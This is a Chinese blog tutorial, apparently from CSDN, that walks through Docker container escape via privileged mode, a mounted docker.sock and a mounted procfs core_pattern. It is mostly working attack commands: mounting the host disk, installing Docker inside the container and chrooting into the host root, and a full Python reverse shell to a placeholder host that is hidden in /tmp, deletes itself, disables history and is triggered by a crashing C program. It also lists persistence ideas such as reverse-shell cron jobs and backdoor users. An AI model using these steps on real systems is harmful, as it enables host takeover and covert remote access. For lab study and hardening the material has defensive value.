Docker容器逃逸-特权模式-危险挂载-Procfs

已于 2024-04-18 16:42:25 修改
阅读量776 收藏 11
点赞数 9
分类专栏: 网络安全 网络空间安全 文章标签: Docker安全
于 2024-04-18 10:48:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XXokok/article/details/137912154
版权

Docker容器逃逸-特权模式-危险挂载

Docker这个概念: Docker 容器与虚拟机类似,但二者在原理上不同,容器是将操作系统层虚拟化,虚拟机则是虚拟化硬件,因此容器更具有便携性、高效地利用服务器。

Docker会遇到的安全问题大概有三点:

  1. 不安全的第三方软件

    1. 例如开发者在代码中引入了存在漏洞版本的 log4j2 组件,然后将其打包成了业务镜像。这样即使代码没有漏洞,但因为引入了不安全的第三方组件也变得有漏洞了。

  2. 不安全的镜像

    1. 在公共镜像仓库比如 Docker Hub 里,会存在一些有漏洞的镜像或者恶意镜像,如果使用了这些镜像那就存在风险了。

  3. 敏感信息泄露

    1. 如果开发者为了开发、调试方便,可能会将数据库账号密码、云服务密钥之类的敏感数据打包到了镜像里,那别人获取到这个镜像后,就会导致敏感信息泄露了。

判断当前是否在Docker中:

没有权限:很难直接通过某个特征直接判断出来,需要经验和目标的综合表现来判断

https://blog.csdn.net/qq_23936389/article/details/131486643

有命令执行权限:查看/.dockerenv这个文件是否存在,存在就是Docker环境

Docker逃逸:

  1. 特权模式启动导致的Docker逃逸:

    启动靶场docker run --rm --privileged=true -it alpine

    判断特权cat /proc/self/status | grep CapEff

    在容器内部执行上面这条命令,从而判断容器是不是特权模式,如果是以特权模式启动的话,CapEff 对应的掩码值应该为0000003fffffffff 或者是 0000001fffffffff
    查看挂载磁盘设备fdisk -l
    挂载目录mkdir /test && mount /dev/vda1 /test​ #把/dev/vda1这个目录改成目标对应的存在的目录;
    #这一步就是因为由特权模式导致权限过高,导致可以把物理机的根目录直接挂载到Docker容器中的虚拟目录

    判断结果cd /test && ls

    image

    权限维持的方法:留下反弹shell的定时计划任务;留下主机木马;创建后门用户

​​

  1. 危险挂载启动导致的Docker逃逸:

启动靶场docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock ubuntu​​
进入环境docker exec -it with_docker_sock /bin/bash​​
检测环境ls -lah /var/run/docker.sock​​
挂载逃逸:(下面这三条命命令就是在docker容器中,再下载一个docke)

apt-get update
apt-get install curl
curl -fsSL https://get.docker.com/ | sh

在容器内部创建一个新的容器,并将宿主机目录挂载到新的容器内部

docker run -it -v /:/host ubuntu /bin/bash chroot /host

上面这两条命令的目的是将当前正在运行的Docker容器的根文件系统切换到宿主机的根文件系统上:

  1. docker run -it -v /:/host ubuntu /bin/bash​:

    • docker run​: 运行一个新的容器。
    • -it​: 分配一个伪终端并保持标准输入打开以便与容器进行交互。
    • -v /:/host​: 将宿主机的根文件系统挂载到容器内的/host​目录。这个挂载的操作允许容器内部访问宿主机的文件系统。
    • ubuntu​: 指定容器的镜像为Ubuntu。
    • /bin/bash​: 在容器内启动bash shell。

  2. chroot /host​:

    • chroot​: 更改根目录到指定目录。
    • /host​: 指定切换到的新根目录。

image

这两个命令的结合效果是,在一个新的Ubuntu容器中,首先将宿主机的根文件系统挂载到容器内的/host​目录上,
然后通过chroot​命令将容器的根目录切换到宿主机的根目录上,从而使得在容器中执行的命令会影响到宿主机的文件系统。
这种操作需要在宿主机上有足够的权限才能执行。

  1. 挂载了宿主机Procfs系统导致的Docker逃逸

    启动环境:docker run -it -v /proc/sys/kernel/core_pattern:/host/proc/sys/kernel/core_pattern ubuntu

    检测环境:find / -name core_pattern

    image

    查看当前容器在宿主机上的绝对路径:cat /proc/mounts | grep docker

    image

    写入文件:

    cat >/tmp/.x.py << EOF

#!/usr/bin/python

import os

import pty

import socket

lhost = "xx.xx.xx.xx"

lport = xxxx

def main():

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.connect((lhost, lport))

    os.dup2(s.fileno(), 0)

    os.dup2(s.fileno(), 1)

    os.dup2(s.fileno(), 2)

    os.putenv("HISTFILE", '/dev/null')

    pty.spawn("/bin/bash")

    os.remove('/tmp/.x.py')

    s.close()

if **name** == "__main__":

    main()

EOF

    image

    chmod +x /tmp/.x.py

    echo -e "|/var/lib/docker/overlay2/4aac278b06d86b0d7b6efa4640368820c8c16f1da8662997ec1845f3cc69ccee/merged/tmp/.x.py \rcore " >/host/proc/sys/kernel/core_pattern

    image

    上面这条echo命令中容器在宿主机的绝对路径要根据自己的环境改变;后面重定向符号到哪里的那个路径也是根据find / -name core_pattern​命令的结果决定的

    cat >/tmp/x.c << EOF

#include <stdio.h>

int main(void)

{

    int *a = NULL;

    *a = 1;

    return 0;

}

EOF

    image

    gcc x.c -o x

    开启监听

    nc -lvvp xxxx

    image

    执行文件:

    ./x

    这反弹出来的权限就会是物理机的权限了

Tips:

  1. docker images 查看系统中docker一共拉取下来的镜像文件有哪些
  2. 特权模式启动并不是指Root用户启动,而是指在启动镜像的时候用了 --rm --privileged=true 这个命令

梧六柒
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安全-云原生技术架构(Docker逃逸技术-特权危险挂载
告白的博客
10-28 720
拿到shell后需要判断是否是处于docker环境中,上面图片我用了很简单的一个方法,查看ls -al下的根目录,看是否存在dockerenv文件,如果存在,则大概率为docker环境,下面还有其他的一些方法,在实战可以多个结合参考。观察到获取到docker搭建的容器shell与真实主机是有区别的,也就是我们存在于docker环境的shell中,不管在内容如何去操作,都只是在容器环境中,这个时候就需要突破容器环境,搭建容器逃逸,控制对方真实主机。后者是将整个系统打包,封装一个系统。
docker特权模式
Bsj' blog
09-16 3969
问题场景: docker的volumes挂载,没有root权限,提示信息如operation permitted 解决方案: 使用dockers的特权模式privileged,表示允许docker做一些特权操作。 docker run命令启动container docker run ..... --privileged docker-compose批启动container # yml文件示例 version '2' service - images: ** - ports: **:
Docker特权模式
qq_39309714的博客
07-14 5552
Docker特权模式 docker使用--privileged, --cap-add, --cap-drop 来对容器本身的能力进行开放或限制,使用 --cap-add, --cap-drop 可以添加或禁用特定的权限 --privileged 参数也可以达到开放权限的作用, 与--cap-add的区别就是, --privileged是将所有权限给容器 由于docker容器的隔离是基于Linux的Capability机制实现的, Linux的Capability机制允许你将超级用户相关的高级权限划分成为不
05-Docker特权模式逃逸
最新发布
日拱一卒,默默努力
10-25 111
在渗透测试的过程中,由于一些服务是部署在Docker容器中,所以当我们拿到一台Docker容器的 shell 后可能需要进行环境的判定,继而进行容器逃逸。在本篇文章中我们将进行总结学习,如何在拿到一台容器后进行流程化的Docker逃逸
Docker逃逸---procfs文件挂载
求大佬师傅带
10-15 922
Docker逃逸---procfs文件挂载
【云计算】使用privilege权限对Docker内核参数进行定制
weixin_34279579的博客
03-15 825
探讨Docker容器中修改系统变量的方法   探讨完Docker对共享内存状态持久化的支持状况后,我将遗留产品build到一个pre-production image中,测试启动是否OK。很显然,我过于乐观了,Docker之路并不平坦。我收到了shmget报出的EINVAL错误码,提示参数非法。 shmget的manual对EINVAL错误码的说明如下: EINVAL: A new...
Docker容器部署RuoYi-Vue前后端分离项目
06-06
Docker容器部署RuoYi-Vue前后端分离项目 此次部署项目是我亲身经历,而且是一次性部署成功,没有部署超过两次甚至多次的情况,过程虽然很艰难,但结果还是很满意的,我希望大家用心去部署这个项目,你发现部署这个...
Docker容器技术-Docker网络模式.pptx
06-09
Docker容器技术
docker-compose-linux-x86_64
09-21
Docker-Compose项目是Docker官方的开源项目,负责实现对Docker容器集群的快速编排。 Docker-Compose将所管理的容器分为三层,分别是工程(project),服务(service)以及容器(container)。Docker-Compose运行...
docker-compose-Linux-v1.25.5.rar
06-02
下载后解压rar,将内部的docker-compose-Linux-x86_64上传到服务器指定目录。 重命名:mv docker-compose-Linux-x86_64 docker-compose 授予可执行权限:chmod +x docker-compose 查看版本,验证安装成功:docker-...
docker-trino-cluster:docker容器上的多节点presto集群
05-09
docker-trino-集群 docker-trino-cluster是一个用于在容器上启动多节点集群的简单工具。 该图像与的master分支同步。 因此,您可以轻松尝试最新的trino以达到开发目的。 特征具有docker-compose的docker容器上的多...
10-docker系列-docker文件共享和特权模式
ouyangzhenxin的博客
02-17 1684
声明:本文乃“运维家”原创,转载请注明出处,更多内容请关注公众号“运维家”。主旨docker容器使用过程中,经常有将日志或者数据放到宿主机上,亦或者配置文件读取宿主机的,别的都使用docker容器里面的,这种情况下我们该如何配置呢?难不成每次都重新打镜像?而且你是不是还发现容器里面明明就是root用户,咋执行一些命令还提示我没有权限呢?咋滴,还有比root用户权限更大的用户嘛?本文就是为了解决这种问题的。环境linux环境 docker环境文件共享在docker使用过程中,我们遇到将日志或者数据放置到
Docker特权容器与capability
SHELLCODE_8BIT的博客
08-17 595
(1条消息) Docker 容器安全(1):我的容器真的需要privileged权限吗?_富士康质检员张全蛋的博客-CSDN博客_docker privileged
复现利用特权模式docker逃逸
qq_54713392的博客
05-17 1523
复现利用特权模式docker逃逸 漏洞说明: 获取某个系统shell后发现其是docker,这时候我们就需要进行docker逃逸来拿到其真正宿主的权限,利用特权模式逃逸 靶机:ubantu16.0 IP地址 192.168.32.142 Docker version 小于 18.09.2版本 当管理员执行docker run -privileged时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。 (1)下载centos镜像 执行命令:docker pull cento
docker run:--privileged=true选项解析(特权模式:赋予容器几乎与主机相同的权限)
热门推荐
Dontla的博客
09-18 1万+
在默认情况下,Docker容器的权限进行了严格的限制,只提供了有限的capabilities。因此,我们需要谨慎地使用这个选项,只在必要的情况下才启用它,并尽量使用其他更细粒度的权限控制手段。选项为容器提供了强大的功能,但它也带来了一些严重的安全隐患。由于privileged容器具有几乎与主机相同的权限,所以如果容器被恶意代码控制,那么攻击者就可以轻易地突破容器的边界,对主机进行任意操作。Docker默认情况下赋予容器一些必要的capabilities,但不包括全部的能力,从而降低了被攻击的风险。
Docker容器拥有特权模式如何操作宿主机
ls0111的博客
10-23 1369
nsenter命令是一个可以在指定进程的命名空间下运行指定程序的命令。它位于util-linux包中。--pid=host使用宿主机命名空间,方便容器获取到宿主机所有进程信息把宿主机的/proc文件夹挂载进入容器的/proc路径,其中/proc/1作为nsenter的target,作为容器向宿主机发送命令的关键部分使得docker容器有root权限执行宿主机命令,确保从容器执行命令的时候不产生权限不足错误--rm退出容器自动将其删除。
Docker网络模式特权指令
m0_37657725的博客
03-10 739
Docker 容器的网络模式介绍 默认的三种网络模式: bridge:桥接模式 host:主机模式 none:无网络模式 查看网络模式docker network ls Docker 容器的bridge模式实战演练 桥接模式docker 的默认网络设置,当Docker服务启动时,在主机上创建一个名为docker0的虚拟网桥(在宿主机上执行:ip addr,可以看到),并选择一个...
(四)Docker进阶网络模式特权指令
csdn570566705的博客
03-16 2663
假设我们需要创建两个容器 container1 和 container2,它们需要在同一个自定义网络 mynetwork 中,并且 container1 需要能够与 container2 通信,而 container2 不需要与 container1 通信。现在,我们需要让 container1 能够与 container2 通信,而 container2 不需要与 container1 通信。注意,这里的 应该替换为 container2 的 IP 地址。
普通用户可以特权方式启动docker容器吗?docker run --privileged
06-11
默认情况下,只有 root 用户才能使用 `--privileged` 参数启动 Docker 容器,因为该参数容器拥有访问宿主机系统资源的特权。如果使用普通用户启动容器提示权限不足的错误。 不过,您可以通过配置 Docker 守护进程来允许普通用户启动特权容器。具体来说,您需要将普通用户添加到 `docker` 用户组中,并将 Docker 守护进程配置为允许该用户组的成员使用特权容器。 具体操作步骤如下: 1. 将普通用户添加到 `docker` 用户组中: ``` sudo usermod -aG docker your_username ``` 其中,`your_username` 是您要添加到 `docker` 用户组中的用户名。 2. 编辑 Docker 配置文件 `/etc/docker/daemon.json`,配置容器运行时的默认参数: ``` { "default-runtime": "nvidia", "runtimes": { "nvidia": { "path": "nvidia-container-runtime", "runtimeArgs": [] } }, "runcmd": [ "/usr/sbin/sysctl -w kernel.perf_event_paranoid=-1" ], "max-concurrent-downloads": 10, "max-concurrent-uploads": 10, "iptables": true, "ipv6": true, "userns-remap": "default", "experimental": true, "features": { "buildkit": true }, "group": "docker" } ``` 其中,`group` 参数设置为 `docker`,表示允许属于 `docker` 用户组的成员使用 Docker。 3. 重新启动 Docker 守护进程: ``` sudo systemctl daemon-reload sudo systemctl restart docker ``` 4. 使用普通用户身份启动特权容器: ``` docker run --privileged -it bcc-image ``` 现在,普通用户已经可以使用特权容器了。需要注意的是,使用特权容器增加安全风险,需要谨慎使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值